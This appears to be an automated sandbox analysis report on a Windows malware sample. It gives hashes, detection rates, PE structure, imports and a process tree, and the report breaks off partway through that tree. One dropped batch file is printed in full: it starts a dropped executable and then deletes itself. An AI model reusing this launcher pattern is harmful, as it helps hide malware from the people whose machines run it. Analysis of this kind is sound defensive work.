                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (982), with no line terminators
                Category:dropped
                Size (bytes):982
                Entropy (8bit):5.910045565114596
                Encrypted:false
                SSDEEP:24:kw1X5ENsVXlWNK6mYqYRIubEfHoUmWdu6qWm:kwFSO7VPusN7u6Tm
                MD5:221C7A37053BD1E6D7317199DA5C663D
                SHA1:4E8AC3707F9A6CC7EFFAD9E1DD7C22EDB7C27B3F
                SHA-256:5F37600F78429E90E53144DBFEFE59B713909CCD352A2E314A5CBD6FF13F666A
                SHA-512:196DA862B0B3ACAAC3EA2A081A67FFA9AA7EDD530EC95F5434981CBB10B668FFB59D5CA728B8292FA868158A97842D67BEF4E55FA9CEB29C9D23273E47C4D905
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (312), with no line terminators
                Category:dropped
                Size (bytes):312
                Entropy (8bit):5.814598476896805
                Encrypted:false
                SSDEEP:6:w+YcgjDIVn10SpwEfIK9aUCUSfaSLnh1moW98NxV/KMn:eGfpwS9awSfaSLnh1JJNSMn
                MD5:615B6668C8CFDCDF679F813C06B2F105
                SHA1:29328692650D8C0B3B31564AE7029B00B4FF9B1C
                SHA-256:BA9A58C6FB49FA4D92E9B1AEB44AF4D40E8677624AC344D1E1CC35C9C45E0AE8
                SHA-512:F544656F0F020D04C9DF0DAC26A88B93DDA280E9CB66A7E6FB82CADEE1B64A6F922B48FDF8567D9FC53BF86A6480624FA8CC4A9C2C31011F9AD1C28B22962CEC
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (639), with no line terminators
                Category:dropped
                Size (bytes):639
                Entropy (8bit):5.898013984508367
                Encrypted:false
                SSDEEP:12:BmWkbRTCB9wyOxrO7fyykI6rW/LhIg8mCzgppGdbZHr3ii15m64nySt+:iWBq+fYIX/LawYLHWi1YMSo
                MD5:31AEDE27A337AC8C389F4669CDE99529
                SHA1:9B0B94024E08853B9F478ECF4EEAA19900AECB49
                SHA-256:C7DD0AE8CA552C1555A626DC8A481D5BE8C740930AA6662B47635AEB35AB9C7E
                SHA-512:B23AB848C890E986E0E21851A822F42E9039E24F776637F40560A28833087C0EAA026B1DD6A083CC45B8A344F4F25BE86C0AF5C72D1F77D6057745AF0F933011
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (625), with no line terminators
                Category:dropped
                Size (bytes):625
                Entropy (8bit):5.886937514286972
                Encrypted:false
                SSDEEP:12:RMC8ZszG/5pyssHvvgZl2+YmEr5DvBCBNHKJg4mA7KwH6hCINX5Rk:j8HissHvYfYmEFD2Fd4mA+y6/NX52
                MD5:10BEA9F4AF17C9CCE917A30F99A421CB
                SHA1:85BA9870E08267B669F447C7C1E98C2FFACB8C0A
                SHA-256:312B7C83E50C290832726D8E8E4F410034D5F18FF9E99425B528F93ADC0EC206
                SHA-512:0D7394E116118F08F0B7FC29049A0E9F01BC7C3247B22DAD1B7F9D2E1A16F6B0979F64FE4C30ACAC9D95DE77FC9327149B10EAF3CA9715F833A3CE72283E20F3
                Malicious:false
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\Public\Videos\AFKwztugVSPq.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\ReviewHost\brokercrt.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1740
                Entropy (8bit):5.36827240602657
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\ReviewHost\brokercrt.exe
                File Type:DOS batch file, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):198
                Entropy (8bit):5.149459720628026
                Encrypted:false
                SSDEEP:6:hITg3Nou11r+DE1BuslAAHovKOZG1923fw+kH:OTg9YDEOqI4P
                MD5:A120F36D4BA86068DE656EC5C360A59C
                SHA1:7C61C3D3BA1D13D120143CF5B8069D5A995800C3
                SHA-256:A38DC351B589024A9160113D219AEC1A68F771C222B4101505C12AA07F6C00DF
                SHA-512:F25046979B020549ACB2954D92AA89267A43CF87D08B03611E46F74700850E781A7484290A9ED9E89AF221F146FAC276FC0135E82AEDA40F2E2B11A97E5AEA94
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\user\AFKwztugVSPq.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bWPufSNCBJ.bat"
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):25
                Entropy (8bit):4.243856189774723
                Encrypted:false
                SSDEEP:3:F/n:F/n
                MD5:60CAEF9400437A97E3DE6AA1245BC1BA
                SHA1:FB8502E61F5231A08E8FFDE9B5F6C75692A6AC3D
                SHA-256:832C6F804C2DF2A9E30873F42F19301B68B22943CC962C5CE61AD811153DE899
                SHA-512:6278AB67A916A15EA1E87E7880663720BFDF95D0EF360BCB91E41E5242682F420BBD6B57B9F6C6AE6ADAF324C2787D16808FC31C35F58CE0DD5479434EFAA276
                Malicious:false
                Preview:TFZxwH1xw3DNHnScdT6fvrUXS
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):61
                Entropy (8bit):5.069600861940249
                Encrypted:false
                SSDEEP:3:52r9A3wJ0BbqXvLtGbQ:5w9DyADtGE
                MD5:7E4B1011E634C9487783E3AAFB05B38C
                SHA1:9C50E2D9F24DF7E47BEEE28DDD1148903DC7E379
                SHA-256:E6CC6B2A0D1EB2FB72D0977D3BC0611F8733B971A835491AAE129141A38A1BEE
                SHA-512:5C5E98BBD34A6280FF00ADB4DC079E2F7B53CF824FDCFC7535E1F9EAA36A81C8A5609782F23668C76C8007BF622EEF546CF6BAB0274A6974A05AE7D4C0D7CA21
                Malicious:false
                Preview:wcFreGyBhsgQDW0e9ABBXQl3G6D6N7FXaiWHzE8QhgS85TCsecyHEfqg1LlhD
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.371677590764862
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:hx1hwVZIjy.exe
                File size:1'165'442 bytes
                MD5:48e5ef4a0ca234c29ceecab25fe23d91
                SHA1:058fec1d069ba2dd6f7ef3af7ff65066b5b9f7b9
                SHA256:0641afd15fce62b273a73f7c8df67b4f192c4056ec788937d6d52a2e814c2ddc
                SHA512:6ba2d8666b43f80e86e1fbf8f4a694d1fe165d86d467ace38094adc585f77a68665dfa7ea7f2dc55ea8977971926b0cc947f410738e8670d8b344471f07dd65b
                SSDEEP:24576:U2G/nvxW3Ww0tLmbqJB7ioiB9yzs9/Hi+i01ZxtYZH:UbA30Lmby7Or9vDE
                TLSH:884549017F44DA11F0191633C2EF490847B4AC11ABA6E72B7EBA376D59123A77C4DACB
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                Icon Hash:1515d4d4442f2d2d
                Entrypoint:0x41ec40
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                Instruction
                call 00007F37A12C6379h
                jmp 00007F37A12C5D8Dh
                cmp ecx, dword ptr [0043E668h]
                jne 00007F37A12C5F05h
                ret
                jmp 00007F37A12C64FEh
                int3
                int3
                int3
                int3
                int3
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F37A12B8C97h
                mov dword ptr [esi], 00435580h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 00435588h
                mov dword ptr [ecx], 00435580h
                ret
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 00435568h
                push eax
                call 00007F37A12C909Dh
                pop ecx
                ret
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F37A12B8C2Eh
                push 0043B704h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F37A12C87B2h
                int3
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F37A12C5EA4h
                push 0043B91Ch
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F37A12C8795h
                int3
                jmp 00007F37A12CA7E3h
                jmp dword ptr [00433260h]
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                push 00421EB0h
                push dword ptr fs:[00000000h]
                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2015 UPD3.1 build 24215
                • [EXP] VS2015 UPD3.1 build 24215
                • [RES] VS2015 UPD3 build 24213
                • [LNK] VS2015 UPD3.1 build 24215
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdfd0 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2268 | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x63000 | 0xdfd0 | 0xe000 | f6c0f34fae6331b50a7ad2efc4bfefdb | False | 0.6370326450892857 | data | 6.6367506404157535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc | 0x71000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                PNG | 0x63650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                PNG | 0x64198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                RT_ICON | 0x65748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                RT_ICON | 0x65cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                RT_ICON | 0x66558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                RT_ICON | 0x67400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                RT_ICON | 0x67868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                RT_ICON | 0x68910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                RT_ICON | 0x6aeb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                RT_DIALOG | 0x6f588 | 0x286 | data | English | United States | 0.5092879256965944
                RT_DIALOG | 0x6f358 | 0x13a | data | English | United States | 0.60828025477707
                RT_DIALOG | 0x6f498 | 0xec | data | English | United States | 0.6991525423728814
                RT_DIALOG | 0x6f228 | 0x12e | data | English | United States | 0.5927152317880795
                RT_DIALOG | 0x6eef0 | 0x338 | data | English | United States | 0.45145631067961167
                RT_DIALOG | 0x6ec98 | 0x252 | data | English | United States | 0.5757575757575758
                RT_STRING | 0x6ff68 | 0x1e2 | data | English | United States | 0.3900414937759336
                RT_STRING | 0x70150 | 0x1cc | data | English | United States | 0.4282608695652174
                RT_STRING | 0x70320 | 0x1b8 | data | English | United States | 0.45681818181818185
                RT_STRING | 0x704d8 | 0x146 | data | English | United States | 0.5153374233128835
                RT_STRING | 0x70620 | 0x446 | data | English | United States | 0.340036563071298
                RT_STRING | 0x70a68 | 0x166 | data | English | United States | 0.49162011173184356
                RT_STRING | 0x70bd0 | 0x152 | data | English | United States | 0.5059171597633136
                RT_STRING | 0x70d28 | 0x10a | data | English | United States | 0.49624060150375937
                RT_STRING | 0x70e38 | 0xbc | data | English | United States | 0.6329787234042553
                RT_STRING | 0x70ef8 | 0xd6 | data | English | United States | 0.5747663551401869
                RT_GROUP_ICON | 0x6ec30 | 0x68 | data | English | United States | 0.7019230769230769
                RT_MANIFEST | 0x6f810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                DLL | Import
                KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                Language of compilation system | Country where language is spoken
                English | United States
                No network behavior found

                Target ID:0
                Start time:07:36:52
                Start date:19/04/2024
                Path:C:\Users\user\Desktop\hx1hwVZIjy.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\hx1hwVZIjy.exe"
                Imagebase:0xf30000
                File size:1'165'442 bytes
                MD5 hash:48E5EF4A0CA234C29CEECAB25FE23D91
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:07:36:53
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe"
                Imagebase:0x8a0000
                File size:147'456 bytes
